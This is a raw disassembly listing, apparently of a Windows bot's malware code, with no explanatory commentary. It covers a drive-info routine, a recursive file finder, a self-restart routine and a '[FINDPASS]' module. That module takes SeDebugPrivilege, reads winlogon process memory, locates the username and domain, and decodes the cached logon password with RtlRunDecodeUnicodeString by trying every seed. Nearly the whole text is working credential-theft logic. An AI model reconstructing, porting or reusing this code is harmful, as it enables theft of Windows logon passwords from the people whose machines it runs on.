jz loc_40333E
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_417320
push edx
push eax
call sub_403162
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_416B5D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_417320
push edx
push eax
call sub_403162
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_416B5D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_417320
push edx
push eax
call sub_403162
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_416B5D
add esp, 18h
pop ebx
jmp short loc_40336D
; ---------------------------------------------------------------------------
loc_40333E: ; CODE XREF: sub_403266+2C�j
; sub_403266+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_416905
lea eax, [ebp+var_130]
push esi
push eax
call sub_416905
lea eax, [ebp+var_B0]
push esi
push eax
call sub_416905
add esp, 18h
loc_40336D: ; CODE XREF: sub_403266+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_403266 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403381 proc near ; CODE XREF: sub_403440+B�j
; sub_403440+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_403266
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4033E1
push ebx
push ebx
call sub_4031D5
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_416B5D
add esp, 14h
jmp short loc_403415
; ---------------------------------------------------------------------------
loc_4033E1: ; CODE XREF: sub_403381+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4031D5
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_416B5D
add esp, 20h
loc_403415: ; CODE XREF: sub_403381+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
lea eax, [ebp+var_380]
push eax
call sub_401ECD
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_403381 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403440 proc near ; CODE XREF: sub_409806+4CD5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_403450
pop ebp
jmp sub_403381
; ---------------------------------------------------------------------------
loc_403450: ; CODE XREF: sub_403440+8�j
push ebx
push esi
push eax
push eax
call dword_43A440 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_416DAF
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_43A440 ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
jz short loc_4034B3
push edi
loc_403477: ; CODE XREF: sub_403440+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_403499
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403381
add esp, 10h
loc_403499: ; CODE XREF: sub_403440+45�j
mov eax, ebx
lea edx, [eax+1]
loc_40349E: ; CODE XREF: sub_403440+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40349E
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_403477
mov ebx, [ebp+arg_C]
pop edi
loc_4034B3: ; CODE XREF: sub_403440+34�j
push ebx
call sub_416C97
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_403440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034BE proc near ; DATA XREF: sub_40FAD0+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43B24C
call dword_43A4B0 ; closesocket
call sub_413827
call dword_43A4BC ; WSACleanup
call dword_43A4BC ; WSACleanup
mov ebx, dword_422000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_422B08+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call dword_422048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call dword_42200C ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_40357D
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, dword_42202C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_40357D: ; CODE XREF: sub_4034BE+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_438AB0
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call dword_422040 ; ExitProcess
int 3 ; Trap to Debugger
sub_4034BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40359E proc near ; CODE XREF: sub_40359E+9E�p
; sub_4036F0+C3�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_2 ; "%s\\*"
lea eax, [ebp+var_248]
push esi
push eax
call sub_416B5D
mov edi, dword_422054
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_40365B
loc_4035EA: ; CODE XREF: sub_40359E+BB�j
test [ebp+var_144], 10h
jz short loc_403647
cmp [ebp+var_118], 2Eh
jnz short loc_40360E
cmp [ebp+var_117], 0
jz short loc_403647
cmp [ebp+var_117], 2Eh
jz short loc_403647
loc_40360E: ; CODE XREF: sub_40359E+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx
push esi
push eax
call sub_416B5D
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40359E
add esp, 2Ch
mov [ebp+arg_14], eax
loc_403647: ; CODE XREF: sub_40359E+53�j
; sub_40359E+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call dword_422050 ; FindNextFileA
test eax, eax
jnz short loc_4035EA
loc_40365B: ; CODE XREF: sub_40359E+4A�j
push [ebp+var_4]
call dword_42204C ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_416B5D
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4036E1
loc_403692: ; CODE XREF: sub_40359E+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_416B5D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_54C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call dword_422050 ; FindNextFileA
test eax, eax
jnz short loc_403692
loc_4036E1: ; CODE XREF: sub_40359E+F2�j
push esi
call dword_42204C ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_40359E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F0 proc near ; DATA XREF: sub_409806+31A3�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A7h
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
lea edx, [eax+1]
xor ebx, ebx
loc_403723: ; CODE XREF: sub_4036F0+38�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403723
sub eax, edx
cmp [ebp+eax+var_115], 5Ch
jnz short loc_40374F
lea eax, [ebp+var_114]
lea edx, [eax+1]
loc_40373F: ; CODE XREF: sub_4036F0+54�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40373F
sub eax, edx
mov [ebp+eax+var_115], bl
loc_40374F: ; CODE XREF: sub_4036F0+44�j
lea eax, [ebp+var_218]
push eax
push offset aFindfileSearch ; "[FINDFILE]: Searching for file: %s."
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_403794
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_405D20
add esp, 14h
loc_403794: ; CODE XREF: sub_4036F0+82�j
push ebx
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_C]
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40359E
push eax
lea eax, [ebp+var_49C]
push offset aFindfileFilesF ; "[FINDFILE]: Files found: %d."
push eax
call sub_416905
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_4037F2
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_405D20
add esp, 14h
loc_4037F2: ; CODE XREF: sub_4036F0+E0�j
lea eax, [ebp+var_49C]
push eax
call sub_401ECD
push [ebp+var_10]
call sub_41397A
pop ecx
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_4036F0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403810 proc near ; CODE XREF: sub_403DEF+AB�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, dword_422060
push edi
mov ebx, 100h
push ebx
push 8
call esi ; GetProcessHeap
mov edi, dword_42205C
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4392B8 ; ZwQuerySystemInformation
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
push ecx
push eax
push ebp
push 10h
mov [esp+38h+var_C], eax
call dword_4392B8 ; ZwQuerySystemInformation
test eax, eax
jnz short loc_4038FD
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_4038FD
xor ecx, ecx
inc ecx
cmp eax, ecx
mov ebx, ebp
mov [esp+28h+var_18], ecx
jb short loc_4038FD
loc_403899: ; CODE XREF: sub_403810+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_4038F0
push 0
push 0
call dword_439AC0 ; RtlCreateQueryDebugBuffer
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_439AC4 ; RtlQueryProcessDebugInformation
test eax, eax
jnz short loc_4038E1
mov eax, [edi+60h]
mov [esp+28h+var_8], eax
lea eax, [edi+80h]
push offset aWinlogon ; "WINLOGON"
push eax
call sub_417456
pop ecx
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz short loc_403915
loc_4038E1: ; CODE XREF: sub_403810+AA�j
test edi, edi
jz short loc_4038EC
push edi
call dword_439AC8 ; RtlDestroyQueryDebugBuffer
loc_4038EC: ; CODE XREF: sub_403810+D3�j
mov eax, [esp+28h+var_10]
loc_4038F0: ; CODE XREF: sub_403810+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_403899
loc_4038FD: ; CODE XREF: sub_403810+6D�j
; sub_403810+7A�j ...
xor edi, edi
loc_4038FF: ; CODE XREF: sub_403810+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
mov eax, edi
loc_40390D: ; CODE XREF: sub_403810+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_403915: ; CODE XREF: sub_403810+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_40397E
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_40392B: ; CODE XREF: sub_403810+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_417456
pop ecx
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz short loc_403992
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_417456
pop ecx
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz short loc_403970
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_403970: ; CODE XREF: sub_403810+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_40392B
loc_40397E: ; CODE XREF: sub_403810+10F�j
test edi, edi
jz short loc_403989
push edi
call dword_439AC8 ; RtlDestroyQueryDebugBuffer
loc_403989: ; CODE XREF: sub_403810+170�j
mov edi, [esp+28h+var_4]
jmp loc_4038FF
; ---------------------------------------------------------------------------
loc_403992: ; CODE XREF: sub_403810+13C�j
xor eax, eax
jmp loc_40390D
sub_403810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403999 proc near ; CODE XREF: sub_403DEF+F0�p
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_44 = byte ptr -44h
var_38 = dword ptr -38h
var_33 = byte ptr -33h
var_2F = byte ptr -2Fh
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 68h
push esi
push [ebp+arg_0]
xor esi, esi
push esi
push 410h
mov [ebp+var_14], esi
call dword_422078 ; OpenProcess
cmp eax, esi
mov [ebp+var_8], eax
jnz short loc_4039C2
xor eax, eax
jmp loc_403B34
; ---------------------------------------------------------------------------
loc_4039C2: ; CODE XREF: sub_403999+20�j
mov eax, [ebp+arg_4]
push ebx
mov [eax], esi
push edi
lea eax, [ebp+var_68]
push eax
call dword_422074 ; GetSystemInfo
push [ebp+var_64]
mov [ebp+var_C], esi
mov esi, dword_422060
push 8
call esi ; GetProcessHeap
mov edi, dword_42205C
push eax
call edi ; RtlAllocateHeap
mov ebx, dword_422070
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_64]
mov [ebp+var_4], eax
push eax
push 7FFDF000h
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_403A12
xor esi, esi
jmp loc_403B27
; ---------------------------------------------------------------------------
loc_403A12: ; CODE XREF: sub_403999+70�j
push 1Ch
lea eax, [ebp+var_44]
push eax
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_8]
call dword_42206C ; VirtualQueryEx
test eax, eax
jz loc_403B16
test [ebp+var_33], 10h
jz loc_403B16
test [ebp+var_2F], 1
jnz loc_403B16
push [ebp+var_38]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_38]
mov eax, [ebp+var_4]
push edi
push dword ptr [eax+18h]
mov [ebp+var_10], edi
push [ebp+var_8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_403B16
loc_403A6D: ; CODE XREF: sub_403999+108�j
push edi
push offset dword_438AB8
call sub_4218CC
test eax, eax
pop ecx
pop ecx
jnz short loc_403A95
lea eax, [edi+200h]
push eax
push offset dword_4392C0
call sub_4218CC
test eax, eax
pop ecx
pop ecx
jz short loc_403AA5
loc_403A95: ; CODE XREF: sub_403999+E3�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_10]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_403A6D
jmp short loc_403B16
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403999+FA�j
test edi, edi
jz short loc_403B16
lea eax, [ebp+var_18]
push eax
lea eax, [edi+410h]
push eax
call dword_422068 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_403AE2
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_18]
push eax
call dword_422064 ; FileTimeToSystemTime
test eax, eax
jz short loc_403AE2
mov ecx, [ebp+arg_4]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_403AE2: ; CODE XREF: sub_403999+123�j
; sub_403999+135�j
movzx eax, byte ptr [edi+42Dh]
mov dword_439AD8, eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
sub eax, [ebp+var_10]
mov [ebp+var_14], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_439AD0, eax
mov dword_439AD4, edi
loc_403B16: ; CODE XREF: sub_403999+90�j
; sub_403999+9A�j ...
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
mov esi, [ebp+var_14]
loc_403B27: ; CODE XREF: sub_403999+74�j
push [ebp+var_8]
call dword_42202C ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_403B34: ; CODE XREF: sub_403999+24�j
pop esi
leave
retn
sub_403999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B37 proc near ; CODE XREF: sub_403DEF:loc_403EE6�p
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_17 = byte ptr -17h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push [ebp+arg_0]
push 0
push 410h
call dword_422078 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jnz short loc_403B56
leave
retn
; ---------------------------------------------------------------------------
loc_403B56: ; CODE XREF: sub_403B37+1B�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+var_50]
push eax
call dword_422074 ; GetSystemInfo
mov eax, [ebp+var_44]
mov ebx, [ebp+var_48]
cmp ebx, eax
mov [ebp+var_10], eax
jnb loc_403C16
mov edi, dword_422060
loc_403B80: ; CODE XREF: sub_403B37+D9�j
push 1Ch
lea eax, [ebp+var_2C]
push eax
push ebx
push [ebp+var_4]
call dword_42206C ; VirtualQueryEx
test eax, eax
jz short loc_403C04
test [ebp+var_1B], 10h
mov eax, [ebp+var_20]
mov [ebp+var_8], eax
jz short loc_403C0A
test [ebp+var_17], 1
jnz short loc_403C0A
push eax
push 8
call edi ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
and [ebp+var_C], 0
mov esi, eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_20]
push esi
push ebx
push [ebp+var_4]
call dword_422070 ; ReadProcessMemory
test eax, eax
jz short loc_403BF6
push offset dword_438AB8
push esi
call sub_4218CC
test eax, eax
pop ecx
pop ecx
jnz short loc_403BF6
lea eax, [esi+400h]
push offset dword_4392C0
push eax
call sub_4218CC
test eax, eax
pop ecx
pop ecx
jz short loc_403C28
loc_403BF6: ; CODE XREF: sub_403B37+95�j
; sub_403B37+A6�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
jmp short loc_403C0A
; ---------------------------------------------------------------------------
loc_403C04: ; CODE XREF: sub_403B37+5B�j
mov eax, [ebp+var_4C]
mov [ebp+var_8], eax
loc_403C0A: ; CODE XREF: sub_403B37+67�j
; sub_403B37+6D�j ...
add ebx, [ebp+var_8]
cmp ebx, [ebp+var_10]
jb loc_403B80
loc_403C16: ; CODE XREF: sub_403B37+3D�j
xor esi, esi
loc_403C18: ; CODE XREF: sub_403B37+123�j
push [ebp+var_4]
call dword_42202C ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C28: ; CODE XREF: sub_403B37+BD�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_439AD0, ebx
mov dword_439AD4, eax
cmp [eax], cl
jnz short loc_403C4A
cmp [eax+1], cl
jz short loc_403C52
loc_403C4A: ; CODE XREF: sub_403B37+10C�j
; sub_403B37+119�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_403C4A
loc_403C52: ; CODE XREF: sub_403B37+111�j
mov eax, [ebp+arg_4]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_403C18
sub_403B37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C5C proc near ; CODE XREF: sub_403DEF+134�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_439ACC
add eax, eax
push ebx
mov ebx, dword_422060
mov [ebp+var_8], ax
add eax, 2
push esi
mov [ebp+var_6], ax
movzx eax, ax
push edi
push eax
push 8
call ebx ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
mov ecx, dword_439ACC
mov esi, dword_439AD4
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov [ebp+var_4], edi
xor eax, eax
rep movsw
mov al, byte ptr dword_439AD8
push eax
call dword_4392BC ; RtlRunDecodeUnicodeString
push [ebp+var_4]
mov esi, offset dword_439AE0
push offset dword_438AB8
push offset dword_4392C0
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push esi
call sub_416B5D
add esp, 1Ch
push [ebp+var_4]
push 0
call ebx ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_403C5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CEE proc near ; CODE XREF: sub_403DEF:loc_403F2A�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_439ACC
add eax, eax
push ebx
mov [ebp+var_C], ax
add eax, 2
push esi
mov [ebp+var_A], ax
movzx eax, ax
push edi
push eax
push 8
call dword_422060 ; GetProcessHeap
push eax
call dword_42205C ; RtlAllocateHeap
and [ebp+var_4], 0
mov [ebp+var_8], eax
mov ebx, offset dword_439CE0
loc_403D28: ; CODE XREF: sub_403CEE+E2�j
mov ecx, dword_439ACC
mov esi, dword_439AD4
mov edi, [ebp+var_8]
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
rep movsw
call dword_4392BC ; RtlRunDecodeUnicodeString
mov eax, dword_439ACC
mov esi, [ebp+var_8]
xor edx, edx
inc edx
xor edi, edi
test eax, eax
jbe short loc_403D81
loc_403D58: ; CODE XREF: sub_403CEE+8D�j
test edx, edx
jz short loc_403DA6
mov cl, [esi]
test cl, cl
jz short loc_403D74
cmp byte ptr [esi+1], 0
jnz short loc_403D74
cmp cl, 20h
jnb short loc_403D6F
xor edx, edx
loc_403D6F: ; CODE XREF: sub_403CEE+7D�j
cmp cl, 7Eh
jbe short loc_403D76
loc_403D74: ; CODE XREF: sub_403CEE+72�j
; sub_403CEE+78�j
xor edx, edx
loc_403D76: ; CODE XREF: sub_403CEE+84�j
inc esi
inc esi
inc edi
cmp edi, eax
jb short loc_403D58
test edx, edx
jz short loc_403DA6
loc_403D81: ; CODE XREF: sub_403CEE+68�j
push [ebp+var_8]
push offset dword_438AB8
push offset dword_4392C0
push [ebp+arg_0]
push offset aFindpassTheWin ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_416B5D
add esp, 1Ch
jmp short loc_403DC6
; ---------------------------------------------------------------------------
loc_403DA6: ; CODE XREF: sub_403CEE+6C�j
; sub_403CEE+91�j
push offset dword_438AB8
push offset dword_4392C0
push [ebp+arg_0]
push offset aFindpassTheW_0 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push ebx
call sub_416B5D
add esp, 18h
loc_403DC6: ; CODE XREF: sub_403CEE+B6�j
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
jbe loc_403D28
push [ebp+var_8]
push 0
call dword_422060 ; GetProcessHeap
push eax
call dword_422058 ; RtlFreeHeap
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_403CEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_403DEF proc near ; DATA XREF: sub_409806+473D�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 29Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_9C]
rep movsd
xor esi, esi
inc esi
mov [eax+90h], esi
call sub_4129C0
cmp eax, esi
mov [ebp+74h+var_4], eax
jz short loc_403E2E
cmp eax, 2
jz short loc_403E2E
push offset aFindpassOnlySu ; "[FINDPASS]: Only supported on Windows N"...
jmp loc_403F6B
; ---------------------------------------------------------------------------
loc_403E2E: ; CODE XREF: sub_403DEF+2E�j
; sub_403DEF+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_408C9C
test eax, eax
pop ecx
pop ecx
jz loc_403F66
push offset aNtdll_dll ; "NTDLL.DLL"
call dword_422088 ; LoadLibraryA
mov esi, dword_422084
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+74h+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4392B8, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_439AC0, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_439AC4, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_439AC8, eax
call esi ; GetProcAddress
mov dword_4392BC, eax
call sub_403810
test eax, eax
mov [ebp+74h+arg_0], eax
jz loc_403F3A
mov esi, dword_422080
mov edi, 400h
push edi
mov ebx, offset dword_438AB8
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_4392C0
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+74h+var_4], 1
